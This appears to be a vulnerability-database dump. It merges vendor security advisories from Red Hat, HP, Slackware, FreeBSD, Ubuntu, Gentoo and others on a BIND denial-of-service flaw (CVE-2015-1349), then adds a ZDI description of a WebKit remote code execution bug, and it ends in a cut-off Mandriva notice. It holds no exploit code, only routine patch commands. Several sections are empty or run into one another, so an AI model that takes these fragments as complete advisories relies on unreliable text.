Red Hat Enterprise Linux Workstation (v. 6):
Source:
bind-9.8.2-0.30.rc1.el6_6.2.src.rpm
i386:
bind-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-chroot-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-libs-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-utils-9.8.2-0.30.rc1.el6_6.2.i686.rpm
x86_64:
bind-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-chroot-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-libs-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-libs-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-utils-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-devel-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-sdb-9.8.2-0.30.rc1.el6_6.2.i686.rpm
x86_64:
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-devel-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-devel-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-sdb-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source:
bind-9.9.4-18.el7_1.1.src.rpm
noarch:
bind-license-9.9.4-18.el7_1.1.noarch.rpm
x86_64:
bind-debuginfo-9.9.4-18.el7_1.1.i686.rpm
bind-debuginfo-9.9.4-18.el7_1.1.x86_64.rpm
bind-libs-9.9.4-18.el7_1.1.i686.rpm
bind-libs-9.9.4-18.el7_1.1.x86_64.rpm
bind-libs-lite-9.9.4-18.el7_1.1.i686.rpm
bind-libs-lite-9.9.4-18.el7_1.1.x86_64.rpm
bind-utils-9.9.4-18.el7_1.1.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
bind-9.9.4-18.el7_1.1.x86_64.rpm
bind-chroot-9.9.4-18.el7_1.1.x86_64.rpm
bind-debuginfo-9.9.4-18.el7_1.1.i686.rpm
bind-debuginfo-9.9.4-18.el7_1.1.x86_64.rpm
bind-devel-9.9.4-18.el7_1.1.i686.rpm
bind-devel-9.9.4-18.el7_1.1.x86_64.rpm
bind-lite-devel-9.9.4-18.el7_1.1.i686.rpm
bind-lite-devel-9.9.4-18.el7_1.1.x86_64.rpm
bind-sdb-9.9.4-18.el7_1.1.x86_64.rpm
bind-sdb-chroot-9.9.4-18.el7_1.1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
bind-9.9.4-18.el7_1.1.src.rpm
noarch:
bind-license-9.9.4-18.el7_1.1.noarch.rpm
x86_64:
bind-debuginfo-9.9.4-18.el7_1.1.i686.rpm
bind-debuginfo-9.9.4-18.el7_1.1.x86_64.rpm
bind-libs-9.9.4-18.el7_1.1.i686.rpm
bind-libs-9.9.4-18.el7_1.1.x86_64.rpm
bind-libs-lite-9.9.4-18.el7_1.1.i686.rpm
bind-libs-lite-9.9.4-18.el7_1.1.x86_64.rpm
bind-utils-9.9.4-18.el7_1.1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
bind-9.9.4-18.el7_1.1.x86_64.rpm
bind-chroot-9.9.4-18.el7_1.1.x86_64.rpm
bind-debuginfo-9.9.4-18.el7_1.1.i686.rpm
bind-debuginfo-9.9.4-18.el7_1.1.x86_64.rpm
bind-devel-9.9.4-18.el7_1.1.i686.rpm
bind-devel-9.9.4-18.el7_1.1.x86_64.rpm
bind-lite-devel-9.9.4-18.el7_1.1.i686.rpm
bind-lite-devel-9.9.4-18.el7_1.1.x86_64.rpm
bind-sdb-9.9.4-18.el7_1.1.x86_64.rpm
bind-sdb-chroot-9.9.4-18.el7_1.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
bind-9.9.4-18.el7_1.1.src.rpm
noarch:
bind-license-9.9.4-18.el7_1.1.noarch.rpm
ppc64:
bind-9.9.4-18.el7_1.1.ppc64.rpm
bind-chroot-9.9.4-18.el7_1.1.ppc64.rpm
bind-debuginfo-9.9.4-18.el7_1.1.ppc.rpm
bind-debuginfo-9.9.4-18.el7_1.1.ppc64.rpm
bind-libs-9.9.4-18.el7_1.1.ppc.rpm
bind-libs-9.9.4-18.el7_1.1.ppc64.rpm
bind-libs-lite-9.9.4-18.el7_1.1.ppc.rpm
bind-libs-lite-9.9.4-18.el7_1.1.ppc64.rpm
bind-utils-9.9.4-18.el7_1.1.ppc64.rpm
s390x:
bind-9.9.4-18.el7_1.1.s390x.rpm
bind-chroot-9.9.4-18.el7_1.1.s390x.rpm
bind-debuginfo-9.9.4-18.el7_1.1.s390.rpm
bind-debuginfo-9.9.4-18.el7_1.1.s390x.rpm
bind-libs-9.9.4-18.el7_1.1.s390.rpm
bind-libs-9.9.4-18.el7_1.1.s390x.rpm
bind-libs-lite-9.9.4-18.el7_1.1.s390.rpm
bind-libs-lite-9.9.4-18.el7_1.1.s390x.rpm
bind-utils-9.9.4-18.el7_1.1.s390x.rpm
x86_64:
bind-9.9.4-18.el7_1.1.x86_64.rpm
bind-chroot-9.9.4-18.el7_1.1.x86_64.rpm
bind-debuginfo-9.9.4-18.el7_1.1.i686.rpm
bind-debuginfo-9.9.4-18.el7_1.1.x86_64.rpm
bind-libs-9.9.4-18.el7_1.1.i686.rpm
bind-libs-9.9.4-18.el7_1.1.x86_64.rpm
bind-libs-lite-9.9.4-18.el7_1.1.i686.rpm
bind-libs-lite-9.9.4-18.el7_1.1.x86_64.rpm
bind-utils-9.9.4-18.el7_1.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
bind-9.9.4-18.ael7b_1.1.src.rpm
noarch:
bind-license-9.9.4-18.ael7b_1.1.noarch.rpm
ppc64le:
bind-9.9.4-18.ael7b_1.1.ppc64le.rpm
bind-chroot-9.9.4-18.ael7b_1.1.ppc64le.rpm
bind-debuginfo-9.9.4-18.ael7b_1.1.ppc64le.rpm
bind-libs-9.9.4-18.ael7b_1.1.ppc64le.rpm
bind-libs-lite-9.9.4-18.ael7b_1.1.ppc64le.rpm
bind-utils-9.9.4-18.ael7b_1.1.ppc64le.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
bind-debuginfo-9.9.4-18.el7_1.1.ppc.rpm
bind-debuginfo-9.9.4-18.el7_1.1.ppc64.rpm
bind-devel-9.9.4-18.el7_1.1.ppc.rpm
bind-devel-9.9.4-18.el7_1.1.ppc64.rpm
bind-lite-devel-9.9.4-18.el7_1.1.ppc.rpm
bind-lite-devel-9.9.4-18.el7_1.1.ppc64.rpm
bind-sdb-9.9.4-18.el7_1.1.ppc64.rpm
bind-sdb-chroot-9.9.4-18.el7_1.1.ppc64.rpm
s390x:
bind-debuginfo-9.9.4-18.el7_1.1.s390.rpm
bind-debuginfo-9.9.4-18.el7_1.1.s390x.rpm
bind-devel-9.9.4-18.el7_1.1.s390.rpm
bind-devel-9.9.4-18.el7_1.1.s390x.rpm
bind-lite-devel-9.9.4-18.el7_1.1.s390.rpm
bind-lite-devel-9.9.4-18.el7_1.1.s390x.rpm
bind-sdb-9.9.4-18.el7_1.1.s390x.rpm
bind-sdb-chroot-9.9.4-18.el7_1.1.s390x.rpm
x86_64:
bind-debuginfo-9.9.4-18.el7_1.1.i686.rpm
bind-debuginfo-9.9.4-18.el7_1.1.x86_64.rpm
bind-devel-9.9.4-18.el7_1.1.i686.rpm
bind-devel-9.9.4-18.el7_1.1.x86_64.rpm
bind-lite-devel-9.9.4-18.el7_1.1.i686.rpm
bind-lite-devel-9.9.4-18.el7_1.1.x86_64.rpm
bind-sdb-9.9.4-18.el7_1.1.x86_64.rpm
bind-sdb-chroot-9.9.4-18.el7_1.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64le:
bind-debuginfo-9.9.4-18.ael7b_1.1.ppc64le.rpm
bind-devel-9.9.4-18.ael7b_1.1.ppc64le.rpm
bind-lite-devel-9.9.4-18.ael7b_1.1.ppc64le.rpm
bind-sdb-9.9.4-18.ael7b_1.1.ppc64le.rpm
bind-sdb-chroot-9.9.4-18.ael7b_1.1.ppc64le.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
bind-9.9.4-18.el7_1.1.src.rpm
noarch:
bind-license-9.9.4-18.el7_1.1.noarch.rpm
x86_64:
bind-9.9.4-18.el7_1.1.x86_64.rpm
bind-chroot-9.9.4-18.el7_1.1.x86_64.rpm
bind-debuginfo-9.9.4-18.el7_1.1.i686.rpm
bind-debuginfo-9.9.4-18.el7_1.1.x86_64.rpm
bind-libs-9.9.4-18.el7_1.1.i686.rpm
bind-libs-9.9.4-18.el7_1.1.x86_64.rpm
bind-libs-lite-9.9.4-18.el7_1.1.i686.rpm
bind-libs-lite-9.9.4-18.el7_1.1.x86_64.rpm
bind-utils-9.9.4-18.el7_1.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
bind-debuginfo-9.9.4-18.el7_1.1.i686.rpm
bind-debuginfo-9.9.4-18.el7_1.1.x86_64.rpm
bind-devel-9.9.4-18.el7_1.1.i686.rpm
bind-devel-9.9.4-18.el7_1.1.x86_64.rpm
bind-lite-devel-9.9.4-18.el7_1.1.i686.rpm
bind-lite-devel-9.9.4-18.el7_1.1.x86_64.rpm
bind-sdb-9.9.4-18.el7_1.1.x86_64.rpm
bind-sdb-chroot-9.9.4-18.el7_1.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2015-1349
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFU/7nhXlSAg2UNWIIRArKUAJ9WX/XGIY2BbVU1+km5wJAaBaPytQCdGBnW
7ZfcyFEskWi6YX7JcLMs9Fg=
=dWCz
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
Release Date: 2015-07-17
Last Updated: 2015-07-17
Potential Security Impact: Remote Denial of Service (DoS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running
BIND. This vulnerability could be exploited remotely to create a Denial of
Service (DoS).
References:
CVE-2015-1349
CVE-2015-4620
SSRT101976
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.31 running BIND 9.7.3 prior to C.9.7.3.7.0
HP-UX B.11.31 running BIND 9.9.4 prior to C.9.9.4.3.0
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2015-1349 (AV:N/AC:H/Au:N/C:N/I:N/A:C) 5.4
CVE-2015-4620 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided updated versions of the BIND service to resolve this
vulnerability.
BIND 9.7.3 for HP-UX Release
Depot Name
Download location
B.11.31 (PA and IA)
HP_UX_11.31_HPUX-NameServer_C.9.7.3.7.0_HP-UX_B.11.31_IA_PA.depot
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumbe
r=BIND
BIND 9.9.4 for HP-UX Release
Depot Name
Download location
B.11.31 (PA and IA)
HP_UX_11.31_HPUX-NameServer_C.9.9.4.3.0_HP-UX_B.11.31_IA_PA.depot
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumbe
r=BIND
MANUAL ACTIONS: Yes - Update
Download and install the software update
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
For BIND 9.7.3
HP-UX B.11.31
==================
NameService.BIND-AUX
NameService.BIND-RUN
action: install revision C.9.7.3.7.0 or subsequent
For BIND 9.9.4
HP-UX B.11.31
==================
NameService.BIND-AUX
NameService.BIND-RUN
action: install revision C.9.9.4.3.0 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 17 July 2015 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
Here are the details from the Slackware 14.1 ChangeLog:
+--------------------------+
patches/packages/bind-9.9.6_P2-i486-1_slack14.1.txz: Upgraded.
For more information, see:
https://kb.isc.org/article/AA-01166/
https://kb.isc.org/article/AA-01161/
https://kb.isc.org/article/AA-01167/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1349
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8500
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8680
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3214
(* Security fix *)
+--------------------------+
Where to find the new packages:
+-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated package for Slackware 13.0:
ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bind-9.9.6_P2-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bind-9.9.6_P2-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1:
ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bind-9.9.6_P2-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bind-9.9.6_P2-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bind-9.9.6_P2-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bind-9.9.6_P2-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bind-9.9.6_P2-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bind-9.9.6_P2-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bind-9.9.6_P2-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bind-9.9.6_P2-x86_64-1_slack14.1.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.10.2-i486-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.10.2-x86_64-1.txz
MD5 signatures:
+-------------+
Slackware 13.0 package:
409f093c9b35cabad287327ad3aaf426 bind-9.9.6_P2-i486-1_slack13.0.txz
Slackware x86_64 13.0 package:
1bee65570447f21f4fe73a8df91d15eb bind-9.9.6_P2-x86_64-1_slack13.0.txz
Slackware 13.1 package:
6caaad4788de51f77a391b3f9ce1f639 bind-9.9.6_P2-i486-1_slack13.1.txz
Slackware x86_64 13.1 package:
47d6656f5dab791b826fbff1aac17e44 bind-9.9.6_P2-x86_64-1_slack13.1.txz
Slackware 13.37 package:
bccb04bab7be8ab02b9623b75f1f5d1e bind-9.9.6_P2-i486-1_slack13.37.txz
Slackware x86_64 13.37 package:
593a2e762e7ed1cb15f8286fea25b98f bind-9.9.6_P2-x86_64-1_slack13.37.txz
Slackware 14.0 package:
5166d66c87a14c561898e65037e1f509 bind-9.9.6_P2-i486-1_slack14.0.txz
Slackware x86_64 14.0 package:
03c6787c991f063c95401578e9b3ff82 bind-9.9.6_P2-x86_64-1_slack14.0.txz
Slackware 14.1 package:
afe0884910ba3177fc760e940eee8f70 bind-9.9.6_P2-i486-1_slack14.1.txz
Slackware x86_64 14.1 package:
ce0c341a39382c43bd23fc59e6937cce bind-9.9.6_P2-x86_64-1_slack14.1.txz
Slackware -current package:
d4f3b5ec462119e670fb95325566765d n/bind-9.10.2-i486-1.txz
Slackware x86_64 -current package:
f604392171654a69ade08e76c46425ef n/bind-9.10.2-x86_64-1.txz
Installation instructions:
+------------------------+
Upgrade the package as root:
# upgradepkg bind-9.9.6_P2-i486-1_slack14.1.txz
Then, restart the name server:
# /etc/rc.d/rc.bind restart
+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com
+------------------------------------------------------------------------+
| To leave the slackware-security mailing list: |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message: |
| |
| unsubscribe slackware-security |
| |
| You will get a confirmation message back containing instructions to |
| complete the process. Please do not reply to this email address.
For the stable distribution (wheezy), this problem has been fixed in
version 1:9.8.4.dfsg.P1-6+nmu2+deb7u4. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2015-09-16-4 OS X Server 5.0.3
OS X Server 5.0.3 is now available and addresses the following:
apache
Available for: OS X Yosemite v10.10.4 or later
Impact: Multiple vulnerabilities in Apache, the most serious of
which may allow a remote attacker to cause a denial of service
Description: Multiple vulnerabilities existed in Apache versions
prior to 2.4.16. These issues were addressed by updating Apache to
version 2.4.16.
CVE-ID
CVE-2013-5704
CVE-2014-3581
CVE-2014-3583
CVE-2014-8109
CVE-2015-0228
CVE-2015-0253
CVE-2015-3183
CVE-2015-3185
BIND
Available for: OS X Yosemite v10.10.4 or later
Impact: Multiple vulnerabilities in BIND, the most severe of which
may allow a remote attacker to cause a denial of service
Description: Multiple vulnerabilities existed in BIND versions prior
to 9.9.7. These issues were addressed by updating BIND to version
9.9.7.
CVE-ID
CVE-2014-8500
CVE-2015-1349
PostgreSQL
Available for: OS X Yosemite v10.10.4 or later
Impact: Multiple vulnerabilities in PostgreSQL, the most serious of
which may lead to arbitrary code execution
Description: Multiple vulnerabilities existed in PostgreSQL versions
prior to 9.3.9. These issues were addressed by updating PostgreSQL to
version 9.3.9.
CVE-ID
CVE-2014-0067
CVE-2014-8161
CVE-2015-0241
CVE-2015-0242
CVE-2015-0243
CVE-2015-0244
CVE-2015-3165
CVE-2015-3166
CVE-2015-3167
Wiki Server
Available for: OS X Yosemite v10.10.4 or later
Impact: Multiple XML security issues in Wiki Server
Description: Multiple XML vulnerabilities existed in Wiki Server
based on Twisted. This issue was addressed by removing Twisted.
CVE-ID
CVE-2015-5911 : Zachary Jones of WhiteHat Security Threat Research
Center
OS X Server 5.0.3 may be obtained from the Mac App Store. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
=============================================================================
FreeBSD-SA-15:05.bind Security Advisory
The FreeBSD Project
Topic: BIND remote denial of service vulnerability
Category: contrib
Module: bind
Announced: 2015-02-25
Credits: ISC
Affects: FreeBSD 8.x and FreeBSD 9.x.
Corrected: 2015-02-18 22:20:19 UTC (stable/9, 9.3-STABLE)
2015-02-25 05:56:54 UTC (releng/9.3, 9.3-RELEASE-p10)
2015-02-18 22:29:52 UTC (stable/8, 8.4-STABLE)
2015-02-25 05:56:54 UTC (releng/8.4, 8.4-RELEASE-p24)
CVE Name: CVE-2015-1349
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.
II. Problem Description
BIND servers which are configured to perform DNSSEC validation and which
are using managed keys (which occurs implicitly when using
"dnssec-validation auto;" or "dnssec-lookaside auto;") may exhibit
unpredictable behavior due to the use of an improperly initialized
variable.
III.
IV. Workaround
Only systems that runs BIND, including recursive resolvers and authoritative
servers that performs DNSSEC validation and using managed-keys are affected.
This issue can be worked around by not using "auto" for the dnssec-validation
or dnssec-lookaside options and do not configure a managed-keys statement.
Note that in order to do DNSSEC validation with this workaround one would
have to configure an explicit trusted-keys statement with the appropriate
keys.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:
# freebsd-update fetch
# freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable
FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
# fetch https://security.FreeBSD.org/patches/SA-15:05/bind.patch
# fetch https://security.FreeBSD.org/patches/SA-15:05/bind.patch.asc
# gpg --verify bind.patch.asc
b) Apply the patch. Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.
Restart the applicable daemons, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each
affected branch.
Branch/path Revision
- -------------------------------------------------------------------------
stable/8/ r278973
releng/8.4/ r279265
stable/9/ r278972
releng/9.3/ r279265
- -------------------------------------------------------------------------
To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:
# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
<URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>
VII. ============================================================================
Ubuntu Security Notice USN-2503-1
February 18, 2015
bind9 vulnerability
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Bind could be made to crash if it received specially crafted network
traffic.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.10:
bind9 1:9.9.5.dfsg-4.3ubuntu0.2
Ubuntu 14.04 LTS:
bind9 1:9.9.5.dfsg-3ubuntu0.2
Ubuntu 12.04 LTS:
bind9 1:9.8.1.dfsg.P1-4ubuntu0.10
In general, a standard system update will make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201510-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: BIND: Denial of Service
Date: October 18, 2015
Bugs: #540640, #553584, #556150, #559462
ID: 201510-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
A vulnerability in BIND could lead to a Denial of Service condition.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-dns/bind < 9.10.2_p4 >= 9.10.2_p4
Description
===========
A vulnerability has been discovered in BIND's named utility leading to
a Denial of Service condition.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All BIND users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-dns/bind-9.10.2_p4"
References
==========
[ 1 ] CVE-2015-1349
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1349
[ 2 ] CVE-2015-4620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4620
[ 3 ] CVE-2015-5477
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5477
[ 4 ] CVE-2015-5722
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5722
[ 5 ] CVE-2015-5986
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5986
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201510-01
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
|
|
var-201006-1183
|
WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly perform ordered list insertions, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document, related to the insertion of an unspecified element into an editable container and the access of an uninitialized element. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple's Webkit. User interaction is required in that a user must be coerced into visiting a malicious website.The specific flaw exists within the way Webkit inserts an element into an editable container. Immediately before the actual insertion the library will manipulate the contents of the field in order to insert the new node. Upon traversal of the tree by the library, the application will attempt to access an uninitialized element that was created prior to the insertion. Successful exploitation can lead to code execution under the context of the application. An attacker can exploit this issue by enticing an unsuspecting victim into viewing a malicious webpage. Failed exploit attempts will result in a denial-of-service condition.
NOTE: This issue was previously covered in BID 40620 (Apple Safari Prior to 5.0 and 4.1 Multiple Security Vulnerabilities) but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. ZDI-10-097: Apple Webkit ContentEditable moveParagraphs Uninitialized Element Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-097
June 8, 2010
-- CVE ID:
CVE-2010-1398
-- Affected Vendors:
Apple
-- Affected Products:
Apple WebKit
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 9850.
-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:
http://support.apple.com/kb/HT4196
-- Disclosure Timeline:
2010-02-18 - Vulnerability reported to vendor
2010-06-08 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* wushi of team509
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2011:039
http://www.mandriva.com/security/
_______________________________________________________________________
Package : webkit
Date : March 2, 2011
Affected: 2010.1
_______________________________________________________________________
Problem Description:
Multiple cross-site scripting, denial of service and arbitrary code
execution security flaws were discovered in webkit.
Please consult the CVE web links for further information.
The updated packages have been upgraded to the latest version (1.2.7)
to correct these issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2797
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2841
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0046
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0047
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0048
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0049
